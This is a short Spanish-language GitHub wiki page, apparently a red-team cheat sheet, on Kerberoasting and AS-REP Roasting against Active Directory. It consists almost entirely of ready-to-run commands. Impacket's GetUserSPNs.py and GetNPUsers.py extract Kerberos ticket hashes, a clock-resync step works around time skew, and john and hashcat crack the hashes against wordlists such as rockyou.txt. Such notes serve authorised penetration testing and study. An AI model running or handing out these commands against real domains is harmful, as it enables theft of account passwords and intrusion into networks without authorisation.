Kerberoasting y ASP‐REP Roasting - miremarti/redteam-stuff GitHub Wiki

Kerberoasting

Obtener el hash:

./GetUserSPNs.py -request -dc-ip <IP> <dominio>/<usuario>:<contraseña>

Si da error por desincronización horaria:

sudo su

timedatectl set-ntp off

rdate -n <IP>

Crackear el hash:

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast

AS-REP Roasting

Obtener el hash:

./GetNPUsers.py <dominio>/ -usersfile /tmp/users.txt -format hashcat -outputfile /tmp/asrep.hashes

Crackear el hash:

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --force

⚠️ **GitHub.com Fallback** ⚠️